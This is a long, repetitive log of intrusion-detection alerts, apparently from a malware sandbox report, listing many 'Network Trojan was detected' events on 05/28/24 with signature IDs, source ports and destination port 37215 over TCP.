            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869578
            SID:2829579
            Source Port:38348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069835
            SID:2829579
            Source Port:60522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582666
            SID:2835222
            Source Port:57512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827476
            SID:2829579
            Source Port:57030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506767
            SID:2835222
            Source Port:38338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392732
            SID:2835222
            Source Port:56540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435225
            SID:2829579
            Source Port:36872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873471
            SID:2829579
            Source Port:58216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.170023
            SID:2835222
            Source Port:34832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543124
            SID:2829579
            Source Port:49472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669833
            SID:2829579
            Source Port:44012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675906
            SID:2835222
            Source Port:44694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766630
            SID:2835222
            Source Port:40748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004731
            SID:2829579
            Source Port:32982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.816731
            SID:2829579
            Source Port:54302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.548967
            SID:2835222
            Source Port:40056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870286
            SID:2829579
            Source Port:35310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952609
            SID:2829579
            Source Port:60272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735858
            SID:2829579
            Source Port:37362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542744
            SID:2835222
            Source Port:45030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722136
            SID:2829579
            Source Port:48152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026900
            SID:2835222
            Source Port:51858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231301
            SID:2835222
            Source Port:40144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057695
            SID:2829579
            Source Port:47616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808020
            SID:2829579
            Source Port:43522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059748
            SID:2835222
            Source Port:50620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.937813
            SID:2835222
            Source Port:45626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052516
            SID:2829579
            Source Port:57056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.946888
            SID:2829579
            Source Port:59094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825380
            SID:2829579
            Source Port:57010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368226
            SID:2835222
            Source Port:49180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507472
            SID:2835222
            Source Port:49590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759602
            SID:2829579
            Source Port:35204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.006125
            SID:2835222
            Source Port:34496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.996296
            SID:2829579
            Source Port:33594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.445860
            SID:2835222
            Source Port:45512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575930
            SID:2829579
            Source Port:40032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654676
            SID:2829579
            Source Port:60962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276780
            SID:2835222
            Source Port:36362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413080
            SID:2829579
            Source Port:43012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.841483
            SID:2835222
            Source Port:40252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557431
            SID:2835222
            Source Port:50334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744646
            SID:2835222
            Source Port:50504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929556
            SID:2835222
            Source Port:49024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.092269
            SID:2829579
            Source Port:52020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308057
            SID:2835222
            Source Port:48550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860490
            SID:2835222
            Source Port:53770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068422
            SID:2829579
            Source Port:57434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424249
            SID:2829579
            Source Port:56600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575017
            SID:2829579
            Source Port:40542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392385
            SID:2835222
            Source Port:58786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860728
            SID:2829579
            Source Port:52906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014144
            SID:2835222
            Source Port:38252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851050
            SID:2835222
            Source Port:53558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086479
            SID:2835222
            Source Port:38322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058729
            SID:2829579
            Source Port:57834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321489
            SID:2835222
            Source Port:33486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309549
            SID:2829579
            Source Port:56270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307568
            SID:2835222
            Source Port:60524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433229
            SID:2835222
            Source Port:47426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291277
            SID:2829579
            Source Port:39124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927156
            SID:2835222
            Source Port:39208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.802312
            SID:2829579
            Source Port:43798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984541
            SID:2829579
            Source Port:38160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968558
            SID:2835222
            Source Port:32794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424067
            SID:2829579
            Source Port:38920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897636
            SID:2835222
            Source Port:36822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903537
            SID:2829579
            Source Port:58990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946605
            SID:2829579
            Source Port:51400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.466285
            SID:2829579
            Source Port:55572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899764
            SID:2835222
            Source Port:48602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999994
            SID:2835222
            Source Port:53758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883411
            SID:2829579
            Source Port:57710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.405584
            SID:2835222
            Source Port:51392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.566515
            SID:2829579
            Source Port:43140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527434
            SID:2829579
            Source Port:35624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185466
            SID:2829579
            Source Port:42406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453973
            SID:2835222
            Source Port:47838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851957
            SID:2829579
            Source Port:47882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.397403
            SID:2835222
            Source Port:60532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811371
            SID:2835222
            Source Port:58444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058390
            SID:2835222
            Source Port:33752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843789
            SID:2835222
            Source Port:44734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858335
            SID:2829579
            Source Port:56170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.607440
            SID:2829579
            Source Port:41878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986187
            SID:2835222
            Source Port:51764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277944
            SID:2829579
            Source Port:57640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810867
            SID:2835222
            Source Port:43076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843770
            SID:2835222
            Source Port:49628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.481318
            SID:2829579
            Source Port:46200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765185
            SID:2829579
            Source Port:53544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.512874
            SID:2835222
            Source Port:45464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961162
            SID:2829579
            Source Port:59762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031426
            SID:2829579
            Source Port:59700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.904951
            SID:2829579
            Source Port:58432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665788
            SID:2829579
            Source Port:58466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.128538
            SID:2835222
            Source Port:35916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840562
            SID:2835222
            Source Port:49478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899033
            SID:2835222
            Source Port:60346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760068
            SID:2835222
            Source Port:56022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852657
            SID:2829579
            Source Port:43244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435672
            SID:2829579
            Source Port:54566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.567677
            SID:2835222
            Source Port:36940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565413
            SID:2835222
            Source Port:57490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759730
            SID:2835222
            Source Port:42484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043243
            SID:2835222
            Source Port:56778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.442116
            SID:2829579
            Source Port:46152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368799
            SID:2829579
            Source Port:34662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459526
            SID:2835222
            Source Port:56246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811309
            SID:2835222
            Source Port:40520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542488
            SID:2829579
            Source Port:39574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766651
            SID:2835222
            Source Port:33034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387149
            SID:2835222
            Source Port:43728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879419
            SID:2835222
            Source Port:37704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.749919
            SID:2829579
            Source Port:60064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810404
            SID:2829579
            Source Port:34224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968318
            SID:2829579
            Source Port:58436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388359
            SID:2835222
            Source Port:48584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.227046
            SID:2835222
            Source Port:48584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762337
            SID:2835222
            Source Port:48588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905656
            SID:2835222
            Source Port:35070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985472
            SID:2835222
            Source Port:52900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764727
            SID:2835222
            Source Port:39794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909210
            SID:2829579
            Source Port:34622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507255
            SID:2829579
            Source Port:43876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655563
            SID:2835222
            Source Port:33270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047910
            SID:2829579
            Source Port:48914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.522955
            SID:2835222
            Source Port:58520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805739
            SID:2829579
            Source Port:49116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735834
            SID:2835222
            Source Port:53198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811324
            SID:2835222
            Source Port:38256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644221
            SID:2829579
            Source Port:55578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941430
            SID:2835222
            Source Port:51336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828157
            SID:2835222
            Source Port:53450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368135
            SID:2835222
            Source Port:42894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564870
            SID:2829579
            Source Port:34642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.912890
            SID:2835222
            Source Port:33616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957002
            SID:2835222
            Source Port:45450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876906
            SID:2835222
            Source Port:42680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.025107
            SID:2829579
            Source Port:57576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765849
            SID:2829579
            Source Port:44758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843069
            SID:2835222
            Source Port:54584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817691
            SID:2829579
            Source Port:42736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506407
            SID:2829579
            Source Port:38538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804681
            SID:2829579
            Source Port:45450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862063
            SID:2829579
            Source Port:34242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543845
            SID:2835222
            Source Port:33998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.402645
            SID:2835222
            Source Port:51092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646289
            SID:2829579
            Source Port:33242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384656
            SID:2835222
            Source Port:35894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685072
            SID:2835222
            Source Port:48422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716629
            SID:2829579
            Source Port:49000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901326
            SID:2835222
            Source Port:39930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944083
            SID:2835222
            Source Port:44202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327398
            SID:2835222
            Source Port:42524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887187
            SID:2829579
            Source Port:54182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764869
            SID:2829579
            Source Port:54086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778376
            SID:2829579
            Source Port:38226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894212
            SID:2835222
            Source Port:56318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789312
            SID:2835222
            Source Port:57112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442716
            SID:2829579
            Source Port:42840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933827
            SID:2829579
            Source Port:52026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993368
            SID:2829579
            Source Port:44116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883429
            SID:2835222
            Source Port:36864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808531
            SID:2829579
            Source Port:43052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942068
            SID:2835222
            Source Port:55540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.322496
            SID:2835222
            Source Port:37800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967957
            SID:2835222
            Source Port:37326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934714
            SID:2835222
            Source Port:58692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938232
            SID:2829579
            Source Port:33478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.952094
            SID:2829579
            Source Port:51946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543182
            SID:2835222
            Source Port:49818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.666730
            SID:2835222
            Source Port:34882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871548
            SID:2829579
            Source Port:46702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804445
            SID:2835222
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984772
            SID:2829579
            Source Port:42550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866497
            SID:2835222
            Source Port:59106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350106
            SID:2835222
            Source Port:47526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745195
            SID:2829579
            Source Port:35310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524082
            SID:2835222
            Source Port:41708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029953
            SID:2829579
            Source Port:39130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878747
            SID:2829579
            Source Port:48774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376005
            SID:2829579
            Source Port:57246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994723
            SID:2829579
            Source Port:47820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334104
            SID:2829579
            Source Port:34604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956344
            SID:2835222
            Source Port:51830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414043
            SID:2835222
            Source Port:50290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424154
            SID:2829579
            Source Port:51552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469847
            SID:2829579
            Source Port:47024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843633
            SID:2829579
            Source Port:55806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.718999
            SID:2829579
            Source Port:44522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436847
            SID:2829579
            Source Port:50578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321159
            SID:2835222
            Source Port:56666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872787
            SID:2835222
            Source Port:44616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654711
            SID:2829579
            Source Port:38184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952763
            SID:2829579
            Source Port:50892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563959
            SID:2829579
            Source Port:36092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
